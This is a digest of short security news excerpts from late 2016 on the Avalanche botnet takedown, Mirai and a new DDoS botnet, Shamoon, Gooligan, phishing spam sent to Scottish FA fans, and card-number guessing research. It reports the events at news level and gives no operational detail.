(Computerworld, dated 5th December 2016 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3147081/security/new-botnet-launching-daily-massive-ddos-attacks.html

A new monster botnet, which hasn't been given a name yet, has been spotted in the wild launching massive DDoS attacks.

Security experts at CloudFlare said the emerging botnet is not related to Mirai, but it is capable of enormous distributed denial-of-service attacks. If this new botnet is just starting up, it could eventually be as powerful as Mirai.

CloudFlare has so far spent 10 days fending off DDoS attacks aimed at organisations on the US West Coast; the strongest attacks peaked at over 480 gigabits per second (Gbps) and 200 million packets per second (Mpps).

CloudFlare first detected the new botnet on November 23; peaking at 400 Gbps and 172 Mpps, the DDoS attack hammered on targets "non-stop for almost exactly 8.5 hours" before the attack ended. CloudFlare's John Graham-Cumming noted, "It felt as if an attacker 'worked' a day and then went home."

Once Thanksgiving, Black Friday and Cyber Monday were over, the attacker changed patterns and started working 24 hours a day.

-----------------------
SCOTTISH FOOTBALL ASSOCIATION APOLOGISES AFTER DATABASE "HACK" SENDS FANS £170 INVOICE SPAM
(International Business Times, dated 5th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/scottish-football-association-apologises-after-database-hack-sends-fans-170-invoice-spam-1594980

The Scottish Football Association (SFA) has been forced to issue an apology after thousands of fans signed up to its official mailing list were sent malware-ridden spam emails.

On the morning of 5 December, numerous subscribers reported receiving an email titled 'Dear Customer' demanding that an invoice for £170 be paid within 48 hours. The phishing email included a link for payment which reportedly led to a malicious file disguised as a website link.

All emails were spoofed to look like official messages and signed as being from the 'Accounts Department' of the Scotland Supporters Club.

-----------------------
CYBERCRIME NETWORK AVALANCHE BROUGHT DOWN BY GLOBAL OPERATION
(International Business Times, dated 2nd December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/cybercrime-network-avalanche-brought-down-by-global-operation-1594519

One of the world's largest known botnet infrastructures, called "Avalanche", was successfully shut down thanks to a joint global operation in which international law enforcement agencies and security experts collaborated to arrest five suspects. Avalanche is believed to have been active since 2009, sending out nearly one million malware-infected emails every week to victims across the globe, according to Europol.

A collaborative operation with EU law enforcement agencies saw five suspects arrested and over 800,000 domains, part of the botnet infrastructure, sinkholed. The massive network reportedly targeted over 40 major financial institutions and according to Europol, involved an estimated "500,000 infected computers worldwide on a daily basis".

----------------------

HACKED IN JUST SIX SECONDS
(The Telegraph, dated 2nd December 2016 author Telegraph Reporters)

Full article [Option 1]:

www.telegraph.co.uk/news/2016/12/02/hacked-just-six-seconds-criminals-need-moments-guess-card-number/

Criminals can work out the card number, expiry date and security code for a Visa debit or credit card in as little as six seconds using guesswork, researchers have found.

Experts from Newcastle University said it was "frighteningly easy" to do with a laptop and an internet connection.

Fraudsters use a so-called Distributed Guessing Attack to get around security features put in place to stop online fraud, and this may have been the method used in the recent Tesco Bank hack.

Researchers found that the system did not detect cyber criminals making multiple invalid attempts on websites in order to get payment card data.

----------------------

MAJOR CYBERCRIME NETWORK AVALANCHE DISMANTLED IN GLOBAL TAKEDOWN
(Computerworld, dated 1st December 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3146705/security/major-cybercrime-network-avalanche-dismantled-in-global-takedown.html

Law enforcement agencies have dismantled a major cybercriminal network responsible for malware-based attacks that have been harassing victims across the globe for years.

The network, called Avalanche, operated as many as 500,000 infected computers on a daily basis and was responsible for delivering malware through phishing email attacks. Avalanche has been active since at least 2009, but on Thursday, authorities in the U.S. and Europe announced they had arrested five suspects allegedly involved with it.

Avalanche has been found distributing more than 20 different malware families, including GozNym, a banking Trojan designed to steal user credentials, and TeslaCrypt, a notorious ransomware. Europol estimated the network has caused hundreds of millions of dollars in damages across the world.

To shut down Avalanche, law enforcement agencies embarked on an investigation that lasted longer than four years and involved agents and prosecutors in more than 40 countries, according to the US Department of Justice.

----------------------
DATA-WIPING MALWARE STRIKES SAUDI GOVERNMENT AGENCIES
(Computerworld, dated 1st December 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3146355/security/data-wiping-malware-strikes-saudi-government-agencies.html

Saudi Arabia's government agencies were hit with a cyberattack that security researchers are blaming on a worm-like malware that can wipe computer systems, destroying data.

Several government bodies and vital installations suffered the attack, disrupting their servers, the country's Saudi Press Agency said on Thursday. The transportation sector was among the agencies hit by an actor from outside the country, the press agency said.

Security firms say the attack involved malware called Shamoon or Disttrack that was previously found targeting a Saudi Arabian oil company four years ago. That attack disabled 30,000 computers.

This latest attack involved the malware acting as a time bomb. Samples of the malicious coding were configured to begin wiping data at 8:45 p.m. local time Nov. 17, the end of the work week in the country, according to security firm Symantec.

----------------------
GOOLIGAN MALWARE SNARES ACCESS TO MORE THAN 1M GOOGLE ACCOUNTS
(Computerworld, dated 30th November 2016 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3145739/security/gooligan-malware-snares-access-to-more-than-1m-google-accounts.html

A new Android malware has managed to steal access to more than 1 million Google accounts, and it continues to infect new devices, according to security firm Check Point.

"We believe that it is the largest Google account breach to date," the security firm said in a Wednesday blog post.

The malware, called Gooligan, has been preying on devices running older versions of Android, from 4.1 to 5.1, which are still used widely, especially in Asia.

Gooligan masquerades as legitimate-looking Android apps. Check Point has found 86 titles, many of which are offered on third-party app stores, that contain the malicious coding.

----------------------
THE NEW MIRAI STRAIN HAS SPREAD FAR BEYOND DEUTSCHE TELEKOM
(Computerworld, dated 29th November 2016 author Michael Kan)

Full article [Option 1]:

http://www.computerworld.com/article/3145403/security/the-new-mirai-strain-has-spread-far-beyond-deutsche-telekom.html

The latest strain of Mirai, the malware that's been infecting internet routers from Germany's Deutsche Telekom, has spread to devices in at least 10 other countries, according to security firm Flashpoint.

The company has detected the new Mirai strain infecting internet routers and modems across the globe, including in the U.K., Brazil, Iran and Thailand.

It's still unclear how many devices have been infected, but Flashpoint estimates that as many as five million devices are vulnerable. "If even a fraction of these vulnerable devices were compromised, they would add considerable power to an existing botnet," Flashpoint said in a Tuesday blog post.

The malware grabbed headlines on Monday when Deutsche Telekom reported that close to a million customers experienced internet connection problems from the new Mirai strain infecting their routers. Although Deutsche Telekom has offered a software update to stop the malware, security experts worry that the hackers will continue to upgrade Mirai's source code to infect additional devices.

----------------------

(1st January 2017)